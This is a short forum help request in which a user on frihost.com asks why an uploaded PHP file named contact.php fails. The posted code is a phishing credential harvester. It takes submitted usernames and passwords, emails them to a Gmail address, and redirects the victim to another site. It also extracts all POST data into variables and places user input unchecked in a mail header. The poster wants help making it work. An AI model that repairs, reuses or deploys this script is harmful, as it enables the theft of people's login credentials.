I am using the frihost.com hosting and i go to file manager, then when i upload my .php, everything is fine... i click on it, and it doesnt work at all... here is the code and the link:
The link: http://www.shisamandisa.frih.net:2222/CMD_FILE_MANAGER/domains/shisamandisa.frih.net/public_html/contact.php
Any help would be appreciated
| Code: |
|
<?php @extract($_POST); $username=$_POST['username']; $password=$_POST['password']; mail('email@gmail.com', $username, $password, "From: $username"); header("Location: anysite.com"); ?> |
The link: http://www.shisamandisa.frih.net:2222/CMD_FILE_MANAGER/domains/shisamandisa.frih.net/public_html/contact.php
Any help would be appreciated
